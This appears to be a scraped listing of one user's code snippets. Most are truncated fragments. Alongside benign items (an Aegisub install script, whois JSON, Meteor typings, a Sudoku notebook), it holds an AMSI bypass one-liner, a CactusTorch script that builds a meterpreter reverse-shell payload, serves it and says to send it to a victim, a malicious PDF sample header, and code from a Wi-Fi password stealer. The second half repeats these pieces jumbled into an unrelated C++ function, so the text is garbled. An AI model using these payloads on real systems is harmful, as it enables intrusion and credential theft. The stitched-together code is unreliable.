Radu Alexandru Popescu u0m3

## install_aegisub.sh
#!/bin/bash

# Add sudo
if [ $EUID -ne 0 ]; then
echo "Error : Must run as root" 1>&2
  exit 1
fi

mkdir -p /tmp/aegisub_workdir
pushd /tmp/aegisub_workdir

## amsibypass.ps1
[Runtime.InteropServices.Marshal]::WriteInt32([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static').GetValue($null),0x41414141)

## anonymous
[
    {
        "extensions": ".abogado, .bayern, .beer, .budapest, .casa, .cooking, .country, .fashion, .fishing, .fit, .garden, .horse, .luxe, .miami, .rodeo, .surf, .vodka, .wedding, .yoga",
        "uri": "whois-dub.mm-registry.com",
        "available": "is available for registration"
    },
    {
        "extensions": ".ac, .ac.ac, .co.ac, .gv.ac, .or.ac",
        "uri": "whois.nic.ac",
        "available": "Available"

## meteor.d.ts
// Type definitions for Meteor 1.3
// Project: http://www.meteor.com/
// Definitions by: Dave Allen <https://github.com/fullflavedave>
// Definitions: https://github.com/borisyankov/DefinitelyTyped

/**
 * These are the common (for client and server) modules and interfaces that can't be automatically generated from the Meteor data.js file
 */

interface EJSONable {

## btcware_config.py
"""
Extract BTCWare Ransomware Config
Author: @demonslay335
"""

import sys
import string
import re
import os
import argparse

## notebook file
{
 "cells": [
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "This is the optional lab on **Solving Sudoku Fast -- Using Python**"
   ]
  },
  {

## PDF JS threat
## Uploaded by @JohnLaTwC
## Sample hash: 55492b266527027fc3fcf9a915e53b2552efe1f51f67f2d2dc356b564df106fc

%PDF-1.1

1 0 obj
<<
 /Type /Catalog
 /Outlines 2 0 R
 /Pages 3 0 R

## CactusTorchDDEAUTO.sh
git clone https://github.com/mdsecactivebreach/CACTUSTORCH.git && cd CACTUSTORCH
IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
msfvenom -p windows/meterpreter/reverse_https LHOST=$IP LPORT=443 -f raw -o payload.bin
PAYLOAD=$(cat payload.bin | base64 -w 0)
sed -i -e 's|var code = ".*|var code = "'$PAYLOAD'";|' CACTUSTORCH.js
sed -i -e 's|Dim code : code = ".*|Dim code : code = "'$PAYLOAD'"|g' CACTUSTORCH.vbs
sed -i -e 's|Dim code : code = ".*|Dim code : code = "'$PAYLOAD'"|g' CACTUSTORCH.hta
cp -t /var/www/html/ CACTUSTORCH.vbs CACTUSTORCH.js CACTUSTORCH.hta
service apache2 start
echo -e "\n\n\n\nOpen Microsoft Word and press CTRL+F9 and copy any of the payloads below in between the { } then save and send to victim.\n\nJS PAYLOAD:\n\

## readxml.cpp
//https://github.com/twelvesec/passcat
//GNU General Public License v3.0
//@maldevel

#include <string>
#include <tchar.h>
#import <msxml6.dll>rename_namespace(_T("MSXML"))

//...

## retrieveWiFiPasswords.cpp
//https://github.com/twelvesec/passcat
//GNU General Public License v3.0
//@maldevel

//...

void libpasscat::cat_wifi_passwords(void) {
	if (!initialized) return;

	DWORD SupportedVersion = 0;
	#!/bin/bash

	# Add sudo
	if [ $EUID -ne 0 ]; then
	echo "Error : Must run as root" 1>&2
	exit 1
	fi

	mkdir -p /tmp/aegisub_workdir
	pushd /tmp/aegisub_workdir
	[
	{
	"extensions": ".abogado, .bayern, .beer, .budapest, .casa, .cooking, .country, .fashion, .fishing, .fit, .garden, .horse, .luxe, .miami, .rodeo, .surf, .vodka, .wedding, .yoga",
	"uri": "whois-dub.mm-registry.com",
	"available": "is available for registration"
	},
	{
	"extensions": ".ac, .ac.ac, .co.ac, .gv.ac, .or.ac",
	"uri": "whois.nic.ac",
	"available": "Available"
	// Type definitions for Meteor 1.3
	// Project: http://www.meteor.com/
	// Definitions by: Dave Allen <https://github.com/fullflavedave>
	// Definitions: https://github.com/borisyankov/DefinitelyTyped

	/**
	* These are the common (for client and server) modules and interfaces that can't be automatically generated from the Meteor data.js file
	*/

	interface EJSONable {
	"""
	Extract BTCWare Ransomware Config
	Author: @demonslay335
	"""

	import sys
	import string
	import re
	import os
	import argparse
	{
	"cells": [
	{
	"cell_type": "markdown",
	"metadata": {},
	"source": [
	"This is the optional lab on Solving Sudoku Fast -- Using Python"
	]
	},
	{
	## Uploaded by @JohnLaTwC
	## Sample hash: 55492b266527027fc3fcf9a915e53b2552efe1f51f67f2d2dc356b564df106fc

	%PDF-1.1

	1 0 obj
	<<
	/Type /Catalog
	/Outlines 2 0 R
	/Pages 3 0 R
	git clone https://github.com/mdsecactivebreach/CACTUSTORCH.git && cd CACTUSTORCH
	IP=`ip -4 addr show eth0 \| grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
	msfvenom -p windows/meterpreter/reverse_https LHOST=$IP LPORT=443 -f raw -o payload.bin
	PAYLOAD=$(cat payload.bin \| base64 -w 0)
	sed -i -e 's\|var code = ".*\|var code = "'$PAYLOAD'";\|' CACTUSTORCH.js
	sed -i -e 's\|Dim code : code = ".*\|Dim code : code = "'$PAYLOAD'"\|g' CACTUSTORCH.vbs
	sed -i -e 's\|Dim code : code = ".*\|Dim code : code = "'$PAYLOAD'"\|g' CACTUSTORCH.hta
	cp -t /var/www/html/ CACTUSTORCH.vbs CACTUSTORCH.js CACTUSTORCH.hta
	service apache2 start
	echo -e "\n\n\n\nOpen Microsoft Word and press CTRL+F9 and copy any of the payloads below in between the { } then save and send to victim.\n\nJS PAYLOAD:\n\
	//https://github.com/twelvesec/passcat
	//GNU General Public License v3.0
	//@maldevel

	#include <string>
	#include <tchar.h>
	#import <msxml6.dll>rename_namespace(_T("MSXML"))

	//...